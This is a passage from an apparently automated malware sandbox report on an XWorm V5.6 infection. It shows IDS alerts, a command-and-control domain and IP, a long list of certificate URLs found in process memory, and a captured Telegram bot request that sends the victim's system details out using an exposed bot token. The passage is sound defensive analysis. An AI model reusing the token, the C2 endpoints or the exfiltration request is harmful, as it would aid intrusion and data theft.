                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49702 version: TLS 1.2

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2853371 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49705 -> 147.185.221.25:41793
                        Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49702 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.8:49702 -> 149.154.167.220:443
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorURLs: develop-oregon.gl.at.ply.gg
                        Connects to many ports of the same IP (likely port scanning)
                        Source: global trafficTCP traffic: 147.185.221.25 ports 41793,1,3,4,7,9
                        Uses the Telegram API (likely for C&C communication)
                        Source: unknownDNS query: name: api.telegram.org
                        Source: global trafficTCP traffic: 192.168.2.8:49703 -> 147.185.221.25:41793
                        Source: global trafficHTTP traffic detected: GET /bot7633754203:AAGdgIxVhns7RJswrsnNS4ilwSCe6ayObHQ/sendMessage?chat_id=1099820672&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AE8A88C49498A9F1316DD%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%204UM_3KAGS%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: unknownDNS query: name: ip-api.com
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 172.67.191.102
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 172.67.191.102
                        Source: unknownUDP traffic detected without corresponding DNS query: 172.67.191.102
                        Source: unknownUDP traffic detected without corresponding DNS query: 172.67.191.102
                        Source: unknownUDP traffic detected without corresponding DNS query: 172.67.191.102
                        Source: unknownUDP traffic detected without corresponding DNS query: 172.67.191.102
                        Source: unknownUDP traffic detected without corresponding DNS query: 172.67.191.102
                        Source: unknownUDP traffic detected without corresponding DNS query: 172.67.191.102
                        Source: unknownUDP traffic detected without corresponding DNS query: 172.67.191.102
                        Source: unknownUDP traffic detected without corresponding DNS query: 172.67.191.102
                        Source: unknownUDP traffic detected without corresponding DNS query: 172.67.191.102
                        Source: unknownUDP traffic detected without corresponding DNS query: 172.67.191.102
                        Source: unknownUDP traffic detected without corresponding DNS query: 172.67.191.102
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET /bot7633754203:AAGdgIxVhns7RJswrsnNS4ilwSCe6ayObHQ/sendMessage?chat_id=1099820672&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AE8A88C49498A9F1316DD%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%204UM_3KAGS%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficDNS traffic detected: DNS query: ip-api.com
                        Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                        Source: global trafficDNS traffic detected: DNS query: develop-oregon.gl.at.ply.gg
                        Source: svhost.exe, 00000003.00000002.2138122248.000000000321F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                        Source: KoaguarLoader.exe, 00000002.00000002.951588515.0000000002868000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FEC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/gsr1.crl
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.00000000024EE000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000245E000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000246A000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000255C000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C04000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018E0000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001CA2000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C32000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FEC000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/gsr1.crl0
                        Source: HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C1E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/gsr1.crl=
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FEC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/r4.crl
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002574000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.00000000024F4000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.00000000024EE000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.00000000024BE000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000246A000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B72000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.0000000001870000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C32000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BA7000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D86000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/r4.crl0
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.00000000024A6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C1E000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001DEE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/we1/2DqfS24kcdI.crl
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001DEE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/we1/2DqfS24kcdI.crl$_U
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.00000000024EE000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.00000000024BE000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002492000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000246A000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B72000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.0000000001870000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C32000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B78000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/we1/2DqfS24kcdI.crl0
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002414000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.0000000001896000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalG2TLSRSASHA2562020CA1-1.crt
                        Source: KoaguarLoader.exe, 00000002.00000002.951588515.0000000002868000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002472000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000245E000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002408000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002466000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000246A000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C38000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C2E000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C28000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C3E000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BAE000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018D0000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B48000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C32000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C5A000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D86000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C00000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalG2TLSRSASHA2562020CA1-1.crt0
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002414000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B9E000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001DF6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.000000000245E000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002408000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000246A000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C38000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C04000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C1E000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B48000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BBE000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C32000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C5A000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C00000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FEC000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002414000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B9E000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001DF6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crthttp://crl3.digicert.com/DigiCertGlobalRootG2.cr
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002560000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001D20000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018E2000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D86000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1219532412.0000000001ECE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
                        Source: I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001D30000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1219532412.0000000001EE2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002560000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001D20000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018E2000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D86000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1219532412.0000000001ECE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002516000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001C88000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.0000000001896000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1217387150.0000000001C14000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002516000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001C88000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.0000000001896000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1217387150.0000000001C14000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl(c)
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.000000000274C000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001D30000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B48000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001DB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1219532412.0000000001EF2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                        Source: I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001D30000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1219532412.0000000001EE2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002560000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001D18000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018E2000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D86000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1219532412.0000000001ECE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                        Source: powershell.exe, 00000005.00000002.1042729977.000002B0D3699000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micl
                        Source: I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001CB0000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1217387150.0000000001C14000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002542000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001C88000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018C2000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C74000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1217387150.0000000001C6E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
                        Source: svchost.exe, 0000000F.00000002.2135608032.000001CB6D800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                        Source: I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001CB0000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1217387150.0000000001C14000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.000000000254A000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001CC2000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018C2000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1217387150.0000000001C74000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002414000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.0000000001896000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalG2TLSRSASHA2562020CA1-1.crl
                        Source: KoaguarLoader.exe, 00000002.00000002.951588515.0000000002868000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002472000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000245E000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002408000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002466000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000246A000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C38000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C2E000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C28000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C3E000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BAE000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018D0000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B48000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C32000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C5A000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D86000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C00000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalG2TLSRSASHA2562020CA1-1.crl0H
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002414000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.0000000001896000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalG2TLSRSASHA2562020CA1-1.crlhttp://crl4.digicert.com/DigiCertG
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002414000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B9E000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001DF6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.000000000245E000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002408000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000246A000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C38000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C04000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C1E000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B48000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BBE000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C32000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C5A000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 